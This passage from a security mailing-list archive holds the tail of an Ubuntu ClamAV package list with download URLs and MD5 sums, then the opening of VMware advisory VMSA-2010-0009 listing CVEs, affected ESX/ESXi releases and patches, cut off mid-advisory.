  Size/MD5:   382010 a9505fb7d8d8f5f0356ca6e78cc7e04a

http://security.ubuntu.com/ubuntu/pool/main/c/clamav/clamav-dbg_0.95.3+dfsg-1ubuntu0.09.04.2_amd64.deb
  Size/MD5:  1167968 1fa1d2e81f9087949fc3b9a03aa8d6ee

http://security.ubuntu.com/ubuntu/pool/main/c/clamav/clamav-freshclam_0.95.3+dfsg-1ubuntu0.09.04.2_amd64.deb
  Size/MD5:   287956 9ffd2f325bc3502f78b35a9b8f193e3a

http://security.ubuntu.com/ubuntu/pool/main/c/clamav/clamav_0.95.3+dfsg-1ubuntu0.09.04.2_amd64.deb
  Size/MD5:   280340 caf37e1970961ec2da36f58172d88049

http://security.ubuntu.com/ubuntu/pool/main/c/clamav/libclamav-dev_0.95.3+dfsg-1ubuntu0.09.04.2_amd64.deb
  Size/MD5:   614446 4ddcb4980913c6e46d5a9eb0b5bcc290

http://security.ubuntu.com/ubuntu/pool/main/c/clamav/libclamav6_0.95.3+dfsg-1ubuntu0.09.04.2_amd64.deb
  Size/MD5:   579218 e7431e82192047d8c826a5b5181f58c4

http://security.ubuntu.com/ubuntu/pool/universe/c/clamav/clamav-milter_0.95.3+dfsg-1ubuntu0.09.04.2_amd64.deb
  Size/MD5:   308570 69d6fba8d6eb6b0565df12334c5b1e4d

  i386 architecture (x86 compatible Intel/AMD):


http://security.ubuntu.com/ubuntu/pool/main/c/clamav/clamav-daemon_0.95.3+dfsg-1ubuntu0.09.04.2_i386.deb
  Size/MD5:   369822 0bc1791b8fe80b663624303440caee1e

http://security.ubuntu.com/ubuntu/pool/main/c/clamav/clamav-dbg_0.95.3+dfsg-1ubuntu0.09.04.2_i386.deb
  Size/MD5:  1082008 dddcf1b0edea5259597406d989699290

http://security.ubuntu.com/ubuntu/pool/main/c/clamav/clamav-freshclam_0.95.3+dfsg-1ubuntu0.09.04.2_i386.deb
  Size/MD5:   285352 a40c187d2495a44fcebf2d6d777d4967

http://security.ubuntu.com/ubuntu/pool/main/c/clamav/clamav_0.95.3+dfsg-1ubuntu0.09.04.2_i386.deb
  Size/MD5:   275122 c11a165ab966c63b8d3fe643b65ad607

http://security.ubuntu.com/ubuntu/pool/main/c/clamav/libclamav-dev_0.95.3+dfsg-1ubuntu0.09.04.2_i386.deb
  Size/MD5:   582384 586b5b1ad20b2b6373addfe17785b5ba

http://security.ubuntu.com/ubuntu/pool/main/c/clamav/libclamav6_0.95.3+dfsg-1ubuntu0.09.04.2_i386.deb
  Size/MD5:   566848 455db6e033a4ecf8f98febcee221aa55

http://security.ubuntu.com/ubuntu/pool/universe/c/clamav/clamav-milter_0.95.3+dfsg-1ubuntu0.09.04.2_i386.deb
  Size/MD5:   304884 1cffeedb1dd62e82bef4939c9d6d84ab

  lpia architecture (Low Power Intel Architecture):



[Full-disclosure] VMSA-2010-0009 ESXi ntp and ESX Service Console third party updates

2010-05-27 Thread VMware Security team
-BEGIN PGP SIGNED MESSAGE-
Hash: SHA1

- 
   VMware Security Advisory

Advisory ID:   VMSA-2010-0009
Synopsis:  ESXi ntp and ESX Service Console third party updates
Issue date:2010-05-27
Updated on:2010-05-27 (initial release of advisory)
CVE numbers:   CVE-2009-2695 CVE-2009-2908 CVE-2009-3228
   CVE-2009-3286 CVE-2009-3547 CVE-2009-3613
   CVE-2009-3612 CVE-2009-3620 CVE-2009-3621
   CVE-2009-3726 CVE-2007-4567 CVE-2009-4536
   CVE-2009-4537 CVE-2009-4538 CVE-2006-6304
   CVE-2009-2910 CVE-2009-3080 CVE-2009-3556
   CVE-2009-3889 CVE-2009-3939 CVE-2009-4020
   CVE-2009-4021 CVE-2009-4138 CVE-2009-4141
   CVE-2009-4272 CVE-2009-3563 CVE-2009-4355
   CVE-2009-2409 CVE-2009-0590 CVE-2009-1377
   CVE-2009-1378 CVE-2009-1379 CVE-2009-1386
   CVE-2009-1387 CVE-2009-4212 CVE-2009-1384
   CVE-2010-0097 CVE-2010-0290 CVE-2009-3736
   CVE-2010-0001 CVE-2010-0426 CVE-2010-0427
   CVE-2010-0382
- 

1. Summary

   ESXi update for ntp and ESX Console OS (COS) updates for COS
   kernel, openssl, krb5, gcc, bind, gzip, sudo.

2. Relevant releases

   VMware ESX 4.0.0 without patches ESX400-201005401-SG,
   ESX400-201005406-SG, ESX400-201005408-SG, ESX400-201005407-SG,
   ESX400-201005405-SG, ESX400-201005409-SG

3. Problem Description

 a. Service Console update for COS kernel

Updated COS package kernel addresses the security issues that are
fixed through versions 2.6.18-164.11.1.

The Common Vulnerabilities and Exposures project (cve.mitre.org)
has assigned the names CVE-2009-2695, CVE-2009-2908, CVE-2009-3228,
CVE-2009-3286, CVE-2009-3547, CVE-2009-3613 to the security issues
fixed in kernel 2.6.18-164.6.1

The Common Vulnerabilities and Exposures project (cve.mitre.org)
has assigned the names CVE-2009-3612, CVE-2009-3620, CVE-2009-3621,
CVE-2009-3726 to the security issues fixed in kernel 2.6.18-164.9.1.

The Common Vulnerabilities and Exposures project (cve.mitre.org)
has assigned the names CVE-2007-4567, CVE-2009-4536, CVE-2009-4537,
CVE-2009-4538 to the security issues fixed in kernel 2.6.18-164.10.1

The Common Vulnerabilities and Exposures project (cve.mitre.org)
has assigned the names CVE-2006-6304, CVE-2009-2910, CVE-2009-3080,
CVE-2009-3556, CVE-2009-3889, CVE-2009-3939, CVE-2009-4020,
CVE-2009-4021, CVE-2009-4138, CVE-2009-4141, and CVE-2009-4272 to
the security issues fixed in kernel 2.6.18-164.11.1.

Column 4 of the following table lists the action required to
remediate the vulnerability in each release, if a solution is
available.

VMware Product   Running  Replace with/
ProductVersion   on   Apply Patch
=    ===  =
VirtualCenter  any   Windows  not affected

hosted *   any   any  not affected

ESXi   any   ESXi not affected

ESX4.0   ESX  ESX400-201005401-SG
ESX3.5   ESX  not applicable
ESX3.0.3 ESX  not applicable
ESX2.5.5 ESX  not applicable

vMA4.0   RHEL5affected, patch pending

  * hosted products are VMware Workstation, Player, ACE, Server, Fusion.

 b. ESXi userworld update for ntp

The Network Time Protocol (NTP) is used to synchronize the time of
a computer client or server to another server or reference time
source.

A vulnerability in ntpd could allow a remote attacker to cause a
denial of service (CPU and bandwidth consumption) by using
MODE_PRIVATE to send a spoofed (1) request or (2) response packet
that triggers a continuous exchange of MODE_PRIVATE error responses
between two NTP daemons.

The Common Vulnerabilities and Exposures Project (cve.mitre.org)
has assigned the name CVE-2009-3563 to this issue.

Column 4 of the following table lists the action required to
remediate the vulnerability in each release, if a solution is
available.

VMware Product   Running  Replace with/
ProductVersion   on   Apply Patch
=    ===  =
VirtualCenter  any   Windows  not affected

hosted *   any   any  not affected

ESXi   4.0   ESXi ESXi400-201005401-SG
ESXi   3.5   ESXi affected, patch pending

ESXany   ESX  not applicable

vMAany   RHEL5not applicable

  * hosted products are VMware Workstation, Player, ACE, Server, Fusion.

 c. Service